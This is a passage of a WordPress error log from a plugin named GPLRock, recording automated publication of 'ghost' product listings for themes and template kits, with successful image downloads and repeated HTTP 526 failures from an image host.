[05-Apr-2026 17:58:33 UTC] GPLRock: Image downloaded successfully for product entox-car-rental-marketplace-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3b209a08.webp [05-Apr-2026 17:58:33 UTC] GPLRock: Using pre-downloaded image for product entox-car-rental-marketplace-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3b209a08.webp [05-Apr-2026 17:58:33 UTC] GPLRock: Ghost product published with image - Product ID: entox-car-rental-marketplace-elementor-template-kit [05-Apr-2026 17:58:34 UTC] GPLRock: Image downloaded successfully for product enton-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bc50a813.webp [05-Apr-2026 17:58:34 UTC] GPLRock: Using pre-downloaded image for product enton-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bc50a813.webp [05-Apr-2026 17:58:34 UTC] GPLRock: Ghost product published with image - Product ID: enton-creative-agency-elementor-template-kit [05-Apr-2026 17:58:35 UTC] GPLRock: Image downloaded successfully for product enigma-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b9cbe8c9.webp [05-Apr-2026 17:58:35 UTC] GPLRock: Using pre-downloaded image for product enigma-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b9cbe8c9.webp [05-Apr-2026 17:58:35 UTC] GPLRock: Ghost product published with image - Product ID: enigma-personal-portfolio-elementor-template-kit [05-Apr-2026 18:00:26 UTC] GPLRock: Image downloaded successfully for product educatico-education-school-online-courses-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-233dda5c.webp [05-Apr-2026 18:00:26 UTC] GPLRock: Using pre-downloaded image for product educatico-education-school-online-courses-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-233dda5c.webp [05-Apr-2026 18:00:26 UTC] GPLRock: Ghost product published with image - Product ID: educatico-education-school-online-courses-elementor-template-kit [05-Apr-2026 18:00:27 UTC] GPLRock: Image downloaded successfully for product edschool-education-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84754afb.webp [05-Apr-2026 18:00:27 UTC] GPLRock: Using pre-downloaded image for product edschool-education-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-84754afb.webp [05-Apr-2026 18:00:27 UTC] GPLRock: Ghost product published with image - Product ID: edschool-education-template-kit [05-Apr-2026 18:00:29 UTC] GPLRock: Image downloaded successfully for product edirne-digital-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1881e837.webp [05-Apr-2026 18:00:29 UTC] GPLRock: Using pre-downloaded image for product edirne-digital-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1881e837.webp [05-Apr-2026 18:00:29 UTC] GPLRock: Ghost product published with image - Product ID: edirne-digital-services-elementor-template-kit [05-Apr-2026 18:00:30 UTC] GPLRock: Image downloaded successfully for product edel-luxury-jewelry-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60a23dd5.webp [05-Apr-2026 18:00:30 UTC] GPLRock: Using pre-downloaded image for product edel-luxury-jewelry-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60a23dd5.webp [05-Apr-2026 18:00:30 UTC] GPLRock: Ghost product published with image - Product ID: edel-luxury-jewelry-elementor-template-kit [05-Apr-2026 18:00:32 UTC] GPLRock: Image downloaded successfully for product dronix-saas-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b6f05247.webp [05-Apr-2026 18:00:32 UTC] GPLRock: Using pre-downloaded image for product dronix-saas-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b6f05247.webp [05-Apr-2026 18:00:32 UTC] GPLRock: Ghost product published with image - Product ID: dronix-saas-startup-elementor-template-kit [05-Apr-2026 18:00:33 UTC] GPLRock: Image downloaded successfully for product drone-media-aerial-photography-videography-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f944d4dd.webp [05-Apr-2026 18:00:33 UTC] GPLRock: Using pre-downloaded image for product drone-media-aerial-photography-videography-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f944d4dd.webp [05-Apr-2026 18:00:33 UTC] GPLRock: Ghost product published with image - Product ID: drone-media-aerial-photography-videography-elementor-template-kit [05-Apr-2026 18:00:35 UTC] GPLRock: Image downloaded successfully for product drivey-car-driving-course-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89d765fa.webp [05-Apr-2026 18:00:35 UTC] GPLRock: Using pre-downloaded image for product drivey-car-driving-course-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89d765fa.webp [05-Apr-2026 18:00:35 UTC] GPLRock: Ghost product published with image - Product ID: drivey-car-driving-course-elementor-template-kit [05-Apr-2026 18:00:36 UTC] GPLRock: Image downloaded successfully for product drago-creative-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a7cfa66.webp [05-Apr-2026 18:00:36 UTC] GPLRock: Using pre-downloaded image for product drago-creative-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a7cfa66.webp [05-Apr-2026 18:00:36 UTC] GPLRock: Ghost product published with image - Product ID: drago-creative-digital-agency-elementor-template-kit [05-Apr-2026 18:00:37 UTC] GPLRock: Image downloaded successfully for product dozer-construction-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68c2791f.webp [05-Apr-2026 18:00:38 UTC] GPLRock: Using pre-downloaded image for product dozer-construction-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-68c2791f.webp [05-Apr-2026 18:00:38 UTC] GPLRock: Ghost product published with image - Product ID: dozer-construction-elementor-template-kit [05-Apr-2026 18:00:39 UTC] GPLRock: Image downloaded successfully for product doughboibakery-bakery-cakery-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-379191e7.webp [05-Apr-2026 18:00:39 UTC] GPLRock: Using pre-downloaded image for product doughboibakery-bakery-cakery-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-379191e7.webp [05-Apr-2026 18:00:39 UTC] GPLRock: Ghost product published with image - Product ID: doughboibakery-bakery-cakery-elementor-template-kit [05-Apr-2026 18:02:22 UTC] GPLRock: Image download failed for product amigos-party-celebration-event-agency (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:24 UTC] GPLRock: Image download failed for product amigos-party-celebration-event-agency (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amigos---party--celebration-event-agency-29164.webp for product amigos-party-celebration-event-agency after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:02:26 UTC] GPLRock: Image download failed for product amigos-party-celebration-event-agency (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:28 UTC] GPLRock: Image download failed for product amigos-party-celebration-event-agency (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amigos---party--celebration-event-agency-29164.webp for product amigos-party-celebration-event-agency after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:02:31 UTC] GPLRock WARNING: Image download failed for product amigos-party-celebration-event-agency. URL: https://meldwp.com/wp-content/uploads/amigos---party--celebration-event-agency-29164.webp [05-Apr-2026 18:02:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amigos-party-celebration-event-agency [05-Apr-2026 18:02:31 UTC] GPLRock: Image download failed for product merope-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:33 UTC] GPLRock: Image download failed for product merope-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/merope---photography-wordpress-theme-5820.webp for product merope-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:02:35 UTC] GPLRock: Image download failed for product merope-photography-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:37 UTC] GPLRock: Image download failed for product merope-photography-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/merope---photography-wordpress-theme-5820.webp for product merope-photography-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:02:39 UTC] GPLRock WARNING: Image download failed for product merope-photography-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/merope---photography-wordpress-theme-5820.webp [05-Apr-2026 18:02:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: merope-photography-wordpress-theme [05-Apr-2026 18:02:39 UTC] GPLRock: Image download failed for product fraxos-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:41 UTC] GPLRock: Image download failed for product fraxos-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fraxos---creative-portfolio-wordpress-theme-13583.webp for product fraxos-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:02:44 UTC] GPLRock: Image download failed for product fraxos-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:46 UTC] GPLRock: Image download failed for product fraxos-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fraxos---creative-portfolio-wordpress-theme-13583.webp for product fraxos-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:02:48 UTC] GPLRock WARNING: Image download failed for product fraxos-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fraxos---creative-portfolio-wordpress-theme-13583.webp [05-Apr-2026 18:02:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fraxos-creative-portfolio-wordpress-theme [05-Apr-2026 18:02:48 UTC] GPLRock: Image download failed for product kuteshop-fashion-electronics-marketplace-elementor-woocommerce-theme-rtl-supported (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:50 UTC] GPLRock: Image download failed for product kuteshop-fashion-electronics-marketplace-elementor-woocommerce-theme-rtl-supported (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kuteshop---fashion-electronics--marketplace-elementor-woocommerce-theme-rtl-supp-27136.webp for product kuteshop-fashion-electronics-marketplace-elementor-woocommerce-theme-rtl-supported after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:02:52 UTC] GPLRock: Image download failed for product kuteshop-fashion-electronics-marketplace-elementor-woocommerce-theme-rtl-supported (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:55 UTC] GPLRock: Image download failed for product kuteshop-fashion-electronics-marketplace-elementor-woocommerce-theme-rtl-supported (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kuteshop---fashion-electronics--marketplace-elementor-woocommerce-theme-rtl-supp-27136.webp for product kuteshop-fashion-electronics-marketplace-elementor-woocommerce-theme-rtl-supported after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:02:57 UTC] GPLRock WARNING: Image download failed for product kuteshop-fashion-electronics-marketplace-elementor-woocommerce-theme-rtl-supported. URL: https://meldwp.com/wp-content/uploads/kuteshop---fashion-electronics--marketplace-elementor-woocommerce-theme-rtl-supp-27136.webp [05-Apr-2026 18:02:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kuteshop-fashion-electronics-marketplace-elementor-woocommerce-theme-rtl-supported [05-Apr-2026 18:02:57 UTC] GPLRock: Image download failed for product fitrush-fitness-and-health-supplements-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:02:59 UTC] GPLRock: Image download failed for product fitrush-fitness-and-health-supplements-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fitrush---fitness-and-health-supplements-wordpress-theme-33511.webp for product fitrush-fitness-and-health-supplements-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:01 UTC] GPLRock: Image download failed for product fitrush-fitness-and-health-supplements-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:03 UTC] GPLRock: Image download failed for product fitrush-fitness-and-health-supplements-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fitrush---fitness-and-health-supplements-wordpress-theme-33511.webp for product fitrush-fitness-and-health-supplements-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:05 UTC] GPLRock WARNING: Image download failed for product fitrush-fitness-and-health-supplements-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fitrush---fitness-and-health-supplements-wordpress-theme-33511.webp [05-Apr-2026 18:03:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fitrush-fitness-and-health-supplements-wordpress-theme [05-Apr-2026 18:03:05 UTC] GPLRock: Image download failed for product ninico-minimal-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:08 UTC] GPLRock: Image download failed for product ninico-minimal-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninico---minimal-woocommerce-wordpress-theme-16754.webp for product ninico-minimal-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:10 UTC] GPLRock: Image download failed for product ninico-minimal-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:12 UTC] GPLRock: Image download failed for product ninico-minimal-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ninico---minimal-woocommerce-wordpress-theme-16754.webp for product ninico-minimal-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:14 UTC] GPLRock WARNING: Image download failed for product ninico-minimal-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ninico---minimal-woocommerce-wordpress-theme-16754.webp [05-Apr-2026 18:03:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ninico-minimal-woocommerce-wordpress-theme [05-Apr-2026 18:03:14 UTC] GPLRock: Image download failed for product hugge-elementor-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:16 UTC] GPLRock: Image download failed for product hugge-elementor-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hugge---elementor-woocommerce-wordpress-theme-32541.webp for product hugge-elementor-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:18 UTC] GPLRock: Image download failed for product hugge-elementor-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:21 UTC] GPLRock: Image download failed for product hugge-elementor-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hugge---elementor-woocommerce-wordpress-theme-32541.webp for product hugge-elementor-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:23 UTC] GPLRock WARNING: Image download failed for product hugge-elementor-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hugge---elementor-woocommerce-wordpress-theme-32541.webp [05-Apr-2026 18:03:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hugge-elementor-woocommerce-wordpress-theme [05-Apr-2026 18:03:23 UTC] GPLRock: Image download failed for product sanjose-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:25 UTC] GPLRock: Image download failed for product sanjose-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sanjose---landing-page-32817.webp for product sanjose-landing-page after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:27 UTC] GPLRock: Image download failed for product sanjose-landing-page (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:29 UTC] GPLRock: Image download failed for product sanjose-landing-page (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sanjose---landing-page-32817.webp for product sanjose-landing-page after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:31 UTC] GPLRock WARNING: Image download failed for product sanjose-landing-page. URL: https://meldwp.com/wp-content/uploads/sanjose---landing-page-32817.webp [05-Apr-2026 18:03:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sanjose-landing-page [05-Apr-2026 18:03:32 UTC] GPLRock: Image download failed for product luminis-photography-wordpress-theme-for-wedding-travel-event-portfolios (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:34 UTC] GPLRock: Image download failed for product luminis-photography-wordpress-theme-for-wedding-travel-event-portfolios (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luminis---photography-wordpress-theme-for-wedding-travel-event-portfolios-29578.webp for product luminis-photography-wordpress-theme-for-wedding-travel-event-portfolios after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:36 UTC] GPLRock: Image download failed for product luminis-photography-wordpress-theme-for-wedding-travel-event-portfolios (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:38 UTC] GPLRock: Image download failed for product luminis-photography-wordpress-theme-for-wedding-travel-event-portfolios (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luminis---photography-wordpress-theme-for-wedding-travel-event-portfolios-29578.webp for product luminis-photography-wordpress-theme-for-wedding-travel-event-portfolios after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:40 UTC] GPLRock WARNING: Image download failed for product luminis-photography-wordpress-theme-for-wedding-travel-event-portfolios. URL: https://meldwp.com/wp-content/uploads/luminis---photography-wordpress-theme-for-wedding-travel-event-portfolios-29578.webp [05-Apr-2026 18:03:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luminis-photography-wordpress-theme-for-wedding-travel-event-portfolios [05-Apr-2026 18:03:40 UTC] GPLRock: Image download failed for product medicare-responsive-wordpress-rtl-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:42 UTC] GPLRock: Image download failed for product medicare-responsive-wordpress-rtl-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medicare-responsive-wordpress-rtl-theme-18839.webp for product medicare-responsive-wordpress-rtl-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:45 UTC] GPLRock: Image download failed for product medicare-responsive-wordpress-rtl-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:47 UTC] GPLRock: Image download failed for product medicare-responsive-wordpress-rtl-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:03:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medicare-responsive-wordpress-rtl-theme-18839.webp for product medicare-responsive-wordpress-rtl-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:03:49 UTC] GPLRock WARNING: Image download failed for product medicare-responsive-wordpress-rtl-theme. URL: https://meldwp.com/wp-content/uploads/medicare-responsive-wordpress-rtl-theme-18839.webp [05-Apr-2026 18:03:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medicare-responsive-wordpress-rtl-theme [05-Apr-2026 18:04:22 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-ranking-table (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1ca5d3b7.jpg [05-Apr-2026 18:04:22 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-ranking-table: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1ca5d3b7.jpg [05-Apr-2026 18:04:22 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-ranking-table [05-Apr-2026 18:04:24 UTC] GPLRock: Image downloaded successfully for product super-forms-email-templates (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8886fd3.jpg [05-Apr-2026 18:04:24 UTC] GPLRock: Using pre-downloaded image for product super-forms-email-templates: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e8886fd3.jpg [05-Apr-2026 18:04:24 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-email-templates [05-Apr-2026 18:04:25 UTC] GPLRock: Image downloaded successfully for product converio-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d184fdb4.jpg [05-Apr-2026 18:04:26 UTC] GPLRock: Using pre-downloaded image for product converio-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d184fdb4.jpg [05-Apr-2026 18:04:26 UTC] GPLRock: Ghost product published with image - Product ID: converio-responsive-multi-purpose-wordpress-theme [05-Apr-2026 18:04:27 UTC] GPLRock: Image downloaded successfully for product blessing-funeral-home-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e7989055.jpg [05-Apr-2026 18:04:27 UTC] GPLRock: Using pre-downloaded image for product blessing-funeral-home-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e7989055.jpg [05-Apr-2026 18:04:27 UTC] GPLRock: Ghost product published with image - Product ID: blessing-funeral-home-wordpress-theme [05-Apr-2026 18:04:29 UTC] GPLRock: Image downloaded successfully for product youtube-plugin-wordpress-gallery-for-youtube (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e574adb6.jpg [05-Apr-2026 18:04:29 UTC] GPLRock: Using pre-downloaded image for product youtube-plugin-wordpress-gallery-for-youtube: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e574adb6.jpg [05-Apr-2026 18:04:29 UTC] GPLRock: Ghost product published with image - Product ID: youtube-plugin-wordpress-gallery-for-youtube [05-Apr-2026 18:04:31 UTC] GPLRock: Image downloaded successfully for product arcade-storefront-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-43239cbf.jpg [05-Apr-2026 18:04:31 UTC] GPLRock: Using pre-downloaded image for product arcade-storefront-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-43239cbf.jpg [05-Apr-2026 18:04:31 UTC] GPLRock: Ghost product published with image - Product ID: arcade-storefront-woocommerce-theme [05-Apr-2026 18:14:29 UTC] GPLRock: Image downloaded successfully for product everest-forms-geolocation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-920b8940.jpg [05-Apr-2026 18:14:29 UTC] GPLRock: Using pre-downloaded image for product everest-forms-geolocation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-920b8940.jpg [05-Apr-2026 18:14:29 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-geolocation [05-Apr-2026 18:14:30 UTC] GPLRock: Image downloaded successfully for product everest-forms-pdf-submission (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24ec71a1.jpg [05-Apr-2026 18:14:30 UTC] GPLRock: Using pre-downloaded image for product everest-forms-pdf-submission: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-24ec71a1.jpg [05-Apr-2026 18:14:30 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-pdf-submission [05-Apr-2026 18:14:32 UTC] GPLRock: Image downloaded successfully for product everest-forms-paypal-standard (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ec93b49.jpg [05-Apr-2026 18:14:32 UTC] GPLRock: Using pre-downloaded image for product everest-forms-paypal-standard: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6ec93b49.jpg [05-Apr-2026 18:14:32 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-paypal-standard [05-Apr-2026 18:14:33 UTC] GPLRock: Image downloaded successfully for product iconic-woocommerce-custom-fields-for-variations (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0afcd81b.jpg [05-Apr-2026 18:14:33 UTC] GPLRock: Using pre-downloaded image for product iconic-woocommerce-custom-fields-for-variations: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0afcd81b.jpg [05-Apr-2026 18:14:33 UTC] GPLRock: Ghost product published with image - Product ID: iconic-woocommerce-custom-fields-for-variations [05-Apr-2026 18:14:35 UTC] GPLRock: Image downloaded successfully for product iconic-image-swap-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51476622.jpg [05-Apr-2026 18:14:35 UTC] GPLRock: Using pre-downloaded image for product iconic-image-swap-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51476622.jpg [05-Apr-2026 18:14:35 UTC] GPLRock: Ghost product published with image - Product ID: iconic-image-swap-for-woocommerce [05-Apr-2026 18:14:36 UTC] GPLRock: Image downloaded successfully for product iconic-woocommerce-quickview (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-686ebd36.jpg [05-Apr-2026 18:14:36 UTC] GPLRock: Using pre-downloaded image for product iconic-woocommerce-quickview: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-686ebd36.jpg [05-Apr-2026 18:14:36 UTC] GPLRock: Ghost product published with image - Product ID: iconic-woocommerce-quickview [05-Apr-2026 18:14:38 UTC] GPLRock: Image downloaded successfully for product iconic-wishlists-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-de1e878d.jpg [05-Apr-2026 18:14:38 UTC] GPLRock: Using pre-downloaded image for product iconic-wishlists-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-de1e878d.jpg [05-Apr-2026 18:14:38 UTC] GPLRock: Ghost product published with image - Product ID: iconic-wishlists-for-woocommerce [05-Apr-2026 18:14:39 UTC] GPLRock: Image downloaded successfully for product iconic-woocommerce-product-configurator (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e76ffdc.jpg [05-Apr-2026 